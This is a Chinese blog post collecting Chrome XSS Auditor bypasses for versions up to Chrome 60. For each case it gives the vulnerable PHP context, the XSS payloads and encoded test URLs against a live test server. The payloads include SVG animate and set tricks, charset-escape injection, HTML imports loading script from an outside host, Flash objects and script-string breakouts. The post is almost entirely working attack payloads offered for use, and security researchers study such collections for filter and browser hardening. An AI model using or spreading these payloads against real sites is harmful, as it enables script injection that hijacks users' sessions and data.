51工具盒子

依楼听风雨
笑看云卷云舒,淡观潮起潮落
当前位置:工具盒子 > 经验分享 > 正文

浏览器安全一 / Chrome XSS Auditor bypass

2024-11-08 分类:经验分享 阅读(13) 评论(0)

私藏比较久的干货,严禁转载。

(2017-08-14 更新,chrome57更新了xss auditor的拦截方式,之前的大量payload不能用了)

Universal Bypass 5 {#universal-bypass-5}

最新版 Chrome 60

context == null

test:

http://mhz.pw/game/xss/xss.php?xss=%3c%62%72%3e%00%00%00%00%00%00%00%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

Bypass 4 (需交互的bypass) {#bypass-4-bypass}

chrome 60

?c=<svg><animate href=#x attributeName=href values=&#x3000;javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
// or
?c=<svg width=10000px height=10000px><a><rect width=10000px height=10000px z-index=9999999 /><animate attributeName=href values=javas&#99ript:alert(1)>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Canimate%20href%3D%23x%20attributeName%3Dhref%20values%3D%26%23x3000%3Bjavascript%3Aalert%281%29%20%2F%3E%3Ca%20id%3Dx%3E%3Crect%20width%3D100%20height%3D100%20%2F%3E%3C%2Fa%3E

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E

Bypass 3 via flash {#bypass-3-via-flash}

只要支持flash的chrome版本(到Chrome 56),均可使用。
context == support flash

<object allowscriptaccess=always> <param name=url value=http://mhz.pw/game/xss/alert.swf>

test

http://mhz.pw/game/xss/xss.php?xss=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=http%3A%2F%2Fmhz.pw%2Fgame%2Fxss%2Falert.swf%3E

Universal Bypass 2 {#universal-bypass-2}

到Chrome 55/56可用, 无任何条件,只要输出在页面中即可执行代码。
context == null

?xss=<svg><set href=#script attributeName=href to=data:,alert(document.domain) /><script id=script src=foo></script>

test

http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cset%20href%3D%23script%20attributeName%3Dhref%20to%3Ddata%3A%2Calert(document.domain)%20%2F%3E%3Cscript%20id%3Dscript%20src%3Dfoo%3E%3C%2Fscript%3E

Universal Bypass 1 {#universal-bypass-1}

到Chrome 55/56可用,无任何条件,只要输出在页面中即可执行代码。
context == null

?xss=<link rel="import" href="https:www.leavesongs.com/testxss"

test

http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3D%22import%22%20href%3D%22https%3Awww.leavesongs.com%2Ftestxss%22

Chrome 59 && 输出点后面有空格的情况 {#chrome-59}

context:

<?php
header('X-XSS-Protection: 1; mode=block');
echo "<!DOCTYPE html><html><head></head><body>{$_GET['html']} </body></html>";

test

http://mhz.pw/game/xss/xss2.php?html=%3Cscript%3Ealert%28%29%3C/script

Chrome 44/45 + 属性中输出的情况 {#chrome-4445}

https://code.google.com/p/chromium/issues/detail?id=526104
chrome45+ fixed
context:

<html>
 <head>
  <title>XSSAuditor bypass</title>
 </head>
<body>
    <form>
    <input type="text" value="<?php echo isset($_GET['input']) ? $_GET['input'] : 'use ?input=foo'?>">
    </form>
</body>
</html>

payload:

"><script>prompt(/XSS/);1%02<script</script>

test
http://mhz.pw/game/xss/attr.php?xss=%22%3E%3Cscript%3Eprompt(%2FXSS%2F)%3B1%2502%3Cscript%3C%2Fscript%3E

无charset Bypass {#charset-bypass}

没有输出charset的情况下,可以通过制定字符集来绕过auditor。
老版的这个编码:ISO-2022-KR,可用 onerror%0f=alert(1) bypass,但现在版本已经没用这个编码,所以该payload只适用于老版本chrome。
新版中,有这个编码:ISO-2022-JP,可以在关键处中加入%1B%28B,会被省略。

context:

<?php
echo $_GET['xss'];

payload:

老版:
xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%0f=alert(1)%3E

新版:
xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

test:
http://mhz.pw/game/xss/charset.php?xss=%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E

输出在属性中,并且后面还有<script>的情况 {#script}

context:

<!doctype HTML>
<img alt="<?php echo $_GET['xss']; ?>">
<script> y = "abc"; </script>

payload

<code>xss="><script/src=data:,alert(1)%2b"
xss=%22%3E%3Cscript/src=data:,alert(document.domain)%2b%22
xss=%22%3E%3Cscript/src=data:,alert(1)%2b%22
xss=%22%3E%3Cscript/src=data:,alert(1)%26sol;%26sol;</code>

test
http://mhz.pw/game/xss/beforescript.php?xss=%22%3E%3Cscript%2Fsrc%3Ddata%3A%2Calert(document.domain)%2B%22

双输出点的情况 {#_1}

context:

<?php 
// Echo the value of parameter one 
echo "This is text1:".$_GET['text1']."<br><br>"; 
// Echo the value of parameter two 
echo "This is text2:".$_GET['text2']."<br><br>"; 
?>

payload:

http://xxx/chrome.php?text1=<script>alert(/XSS/);void('&text2=')</script> 
http://xxx/chrome.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>

test
http://mhz.pw/game/xss/doubleout.php?text1=%3Cscript%3Ealert(/XSS/);void(%27&text2=%27)%3C/script%3E

Chrome 43 XSSAuditor bypass {#chrome-43-xssauditor-bypass}

大概2015-06-23以前的版本均可。
context==全部情况
payload:

xss=<svg><script>/<1/>alert(document.domain)</script></svg>

test
http://mhz.pw/game/xss/xss.php?xss=%3Csvg%3E%3Cscript%3E/%3C1/%3Ealert(document.domain)%3C/script%3E%3C/svg%3E

Chrome 36~40 link 导入html导致bypass {#chrome-3640-link-htmlbypass}

Fixed in Oct 10, 2014.(实际上15年初还存在)
https://code.google.com/p/chromium/issues/detail?id=421166
http://www.wooyun.org/bugs/wooyun-2010-090304
由于link导入外部html导致XSSAuditor绕过。
context==全部情况

payload

xss=<link rel=import href=https://auth.mhz.pw/game/xss/link.php>

test
http://mhz.pw/game/xss/xss.php?xss=%3Clink%20rel%3Dimport%20href%3Dhttps%3A%2F%2Fauth.mhz.pw%2Fgame%2Fxss%2Flink.php%3E

输出在script内字符串位置的情况 {#script_1}

如果允许闭合字符串,直接闭合并写入javascript即可,如: http://mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
但如果不能闭合单引号呢?如这个context

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>all</title>
    <script type="text/javascript">
    var a = '<?php echo addslashes($_GET["xss"]); ?>';
    </script>
</head>
<body>
123
</body>
</html>

payload

<script>
x = "</script><svg><script>alert(1)+&quot;";

<script>
x = "</script><svg><script>alert(1)+'";

test
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)%2b%26apos%3B
http://mhz.pw/game/xss/scriptaddslashes.php?xss=%3C/script%3E%3Csvg%3E%3Cscript%3Ealert(1)//

有可控上传点的通用Bypass {#bypass}

context:
网站域名下有可控的上传点,我可以上传一个.txt或.js等文件(只要不是媒体文件,其他文件均可,比如上传是黑名单验证的,可以随便写个后缀)。再引入script标签的src属性即可。

payload

xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E

test
http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.txt%3E%3C/script%3E

http://mhz.pw/game/xss/xss.php?xss=%3Cscript%20src=/game/xss/upload/upload.ayu%3E%3C/script%3E

JSON Encode {#json-encode}

context

<?=json_encode($_GET['x'])?>

payload

?x=<img+src=x+onerror=`ö`-alert(1)>

存在字符替换的情况 {#_2}

当输出点在输出前存在字符(大部分字符,字符串什么的都可以)的替换,context如下:

<?php
echo str_replace('"', '&quote;', $_REQUEST['name']);
echo str_replace('&', '&amp;', $_REQUEST['name']);
echo str_replace('\\', '&bsol;', $_REQUEST['name']);
echo str_replace('#', '&num;', $_REQUEST['name']);
echo str_replace('xxxx', 'b', $_REQUEST['name']);

既可以在payload里带入该字符进行绕过auditor:

xss=<script>'"'/alert(1)</script>

test
http://mhz.pw/game/xss/amps.php?name=zx%3Cscript%3E%27%26%27/alert(1)%3C/script%3Eczxc

赞(2)
未经允许不得转载:工具盒子 » 浏览器安全一 / Chrome XSS Auditor bypass
标签:

厉飞雨

众生皆苦,唯有自渡!

相关推荐

最新文章

猜你喜欢

快捷分类

云服务器 日常运维 在线免费 开源工具 科学上网 开发笔记 区块链 白嫖帮 新视野 人工智能 网赚思路 Python笔记 Php笔记 Java笔记 链知识 币知识 IOS笔记 Android笔记 Mysql C语言笔记 前端开发 R笔记 Go笔记 mybatis笔记 Golang笔记 数据库 市场营销 软件教程 vps Rust笔记 软件使用 经验分享 Stable Diffusion chatgpt Midjourney 操作系统 Photoscape 加密货币 挖矿 Coze Meta 网络安全 网络运营 开源软件 Github ComfyUI 数字人 Docker笔记 Claude Oracle web3 linux windows mac redis git笔记 nginx kafka maven spring RocketMQ Zabbix ubuntu centos kubesphere ffmpeg jenkins hbase JavaScript笔记 WordPress nginx Hadoop vuejs mongo SQL Server PostgreSQL SQLite ElasticSearch Spark netty zookeeper RabbitMQ ClickHoust cocos2d gradle tomcat Markdown MinIO react Hexo git intellij idea android studio svn C++ spdlog nodejs C WordPress 宝塔面板 vim shell logstash 软件渗透 NeoDB CSS3 HTML Lua笔记 数据算法 嵌入式 debian 红帽RHEL Neo4j